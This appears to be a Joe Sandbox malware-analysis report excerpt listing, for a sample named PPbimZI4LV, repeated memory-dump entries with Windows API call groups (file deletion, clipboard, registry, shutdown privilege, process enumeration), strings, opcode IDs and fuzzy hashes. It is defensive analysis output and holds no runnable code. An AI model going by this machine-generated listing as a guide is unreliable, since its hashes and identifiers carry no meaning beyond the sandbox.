                                                                      • Instruction Fuzzy Hash: 1A419311A0CA8352EA50BB15A84667963A1FF44BF4F805231DD6EE76D6FF3CD409EB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 3218304859-0
                                                                      • Opcode ID: 45b658a51b3e557c0ff4969c1d9b7dfee56050206255f65532400d9fc3fc3bd5
                                                                      • Instruction ID: 9733f26dac67e6c6b6706e6e0e71cc69de14b90ccc7e1712a3ece529cd903e25
                                                                      • Opcode Fuzzy Hash: 45b658a51b3e557c0ff4969c1d9b7dfee56050206255f65532400d9fc3fc3bd5
                                                                      • Instruction Fuzzy Hash: 57F19232B09A4286EB10FF65D5922AC33B0FB89B98B058531DE4DE7B96EF38D105D744
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                      • Instruction ID: 8eacccb07ec2062acca1a72bbae7a7bba8fd19685488793d9663039ee174b42c
                                                                      • Opcode Fuzzy Hash: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                      • Instruction Fuzzy Hash: BEC17C76B08B8581EB10FF2AE8861AD77A0FB88B94F054136DE4E97766EF38D445D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 1255039815-0
                                                                      • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                      • Instruction ID: d1e7a7c8d4f56becf33706f52b900c96dc5b493085a4f0fb5534cc8e5e1cbb51
                                                                      • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                      • Instruction Fuzzy Hash: B061A122B186518AFB14FF61D8465EC77A4FB84B88B044035DE4EE379AEF38D949DB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2395222682-0
                                                                      • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                      • Instruction ID: 69a3d7086b9701eb36e8d5a9a307ff4a18289b7eabcdc7fde90f98de1a26f0b8
                                                                      • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                      • Instruction Fuzzy Hash: EED12D37B08B4686FB10BF65D4422AD63A1FB98B88B504436DE4DEBB56EF38E445D340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                      • Instruction ID: 1a98537dbdd7a08855ed7bdede2a6b29e8175afbf7f7a984ef0471191852bb7a
                                                                      • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                      • Instruction Fuzzy Hash: A871E236609A9186EB60EF65E8456ED3760FB88B94F500132DE4DD3BA5EF3CD186D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                      • Instruction ID: 1e94faa53a1ae8802cc7e9b27c4037dacbf4be5670072c244d9e4393c9f4e1ac
                                                                      • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                      • Instruction Fuzzy Hash: 2E413762A0CA4282EB44FB16D5963787760BF94B85F058434DA4EE77A3EF7CE0419704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4047182710-1173974218
                                                                      • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                      • Instruction ID: c6f1000584c43b24895030b7cee758a521b85c2be845e01ee5a61c32c3b3b908
                                                                      • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                      • Instruction Fuzzy Hash: 3C814522A1CA4295FB50FF65E4421FD6B60EF84794F801032EA4EE66ABEF3CD549D700
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: 4ab9c3212860d8adb67b4643888885f6fb66013b87228f696311c510e3b65074
                                                                      • Instruction ID: 179b15201813d6106804d180b2fea12fc88d10d47ead39a78c257d69033d5228
                                                                      • Opcode Fuzzy Hash: 4ab9c3212860d8adb67b4643888885f6fb66013b87228f696311c510e3b65074
                                                                      • Instruction Fuzzy Hash: A4E1B036A0CB8286EB10FF65D4412AD77A0FB88B98F504136DA4DEBB95EF38E545D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                      • Instruction ID: 7be67f22e79f189a77cc62a82357c6ddd4a6c4529acf4622619acd0180762ce4
                                                                      • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                      • Instruction Fuzzy Hash: 20417222A2CA4296EB50FB10E9422ED6360FF84790F901531EA5EE3697EF7CD505D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                      • Instruction ID: 375bbadccf09bdea98c66194f4dbe00c555aa77603a6c7d9fb463d40db8816c0
                                                                      • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                      • Instruction Fuzzy Hash: 7031603661CB8186EB60EF25E8412AE73A4FB88755F500135EA9DD3B9AEF3CC5458B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                      • String ID: *.*
                                                                      • API String ID: 1927845040-438819550
                                                                      • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                      • Instruction ID: 69bc3ec79539c1f19bbae598565530af8ffcdb9f7f51e1b2e44e9d2755dab3e3
                                                                      • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                      • Instruction Fuzzy Hash: A1517322A0CB8296EB10FB15E8461AD63B0FB857A4F540132DE5DE379AEF3CD945D700
                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF643962D60
                                                                        • Part of subcall function 00007FF64395B184: GetCurrentProcess.KERNEL32(00007FF64395B21D), ref: 00007FF64395B1B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                      • String ID: *$.$.
                                                                      • API String ID: 2518042432-2112782162
                                                                      • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                      • Instruction ID: 6b429468b92a9a1a64b813a0fbacf75fcd3969c07ea79463d665344be06f0095
                                                                      • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                      • Instruction Fuzzy Hash: A451E062F19B5584FB15FBA598122BD23A4BB48BC8F545435CE4DE7B86EF38D0429340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1286766494-0
                                                                      • Opcode ID: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                      • Instruction ID: 3809c68083f0be675eb9143564330eb20d14d3a9faf802b89c95f8776fbbd810
                                                                      • Opcode Fuzzy Hash: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                      • Instruction Fuzzy Hash: 55A2DF33B0D6428AE724BF24D4921B933A1FB44789F144535DB8DD3A9AEF3DE991A700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2163645468-3733053543
                                                                      • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                      • Instruction ID: 2d9a7782ec181194206504ce0d11cf2be9c33a28a6550c420d4a98ba8b8b40a7
                                                                      • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                      • Instruction Fuzzy Hash: FE118F32B1C60286E764BF29E88216E6252AF84750F494135E54DE3ADAFF2CD805AB40
                                                                      APIs
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF643945C43
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 389471666-631824599
                                                                      • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                      • Instruction ID: e6d7d1cebda5532457993bdff009fc751a999581866414178f77421a149e5cb3
                                                                      • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                      • Instruction Fuzzy Hash: 7D116A32A1CB42A6FB44BB62D6563B933A0FB54345F404138C64DD2A52EF3CE0A8DB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-1355242751
                                                                      • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                      • Instruction ID: 69cab936a141098aa814386b200a37531d26e3f16d2bf285b6b996ced0761751
                                                                      • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                      • Instruction Fuzzy Hash: 7AE0ED22909F0A82FF15BB50E8163A823E0FB08B48F540434D91DE5765FFBCD594D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: Variable must be of type 'Object'.
                                                                      • API String ID: 1385522511-109567571
                                                                      • Opcode ID: 28f90ac2e257d6436df08bc08313024deef07c53144b9bf1108805a6d031b462
                                                                      • Instruction ID: db70d9a4ed8ec912cbcfd89707bc48c23a8b5f6e6136819bd93ad13f86d9428a
                                                                      • Opcode Fuzzy Hash: 28f90ac2e257d6436df08bc08313024deef07c53144b9bf1108805a6d031b462
                                                                      • Instruction Fuzzy Hash: CFC28372A4C68286EB64BF15D4822BD77A1FB48B94F544131DA4EE7B96EF3CE441E300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2733932498-0
                                                                      • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                      • Instruction ID: 4d58e7b62570011bdcdfd459e92233e0906a6ecd1a06a745276403c1787d1144
                                                                      • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                      • Instruction Fuzzy Hash: 9DB16D26B08B5681EB10BF26D4926AD6760FB48FD4F095436DE0DEB797EE38E440E300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 2000298826-0
                                                                      • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                      • Instruction ID: 15d2e452cfdacb430121b346266f1493336ae19a6fafae2197a8627a05d04f57
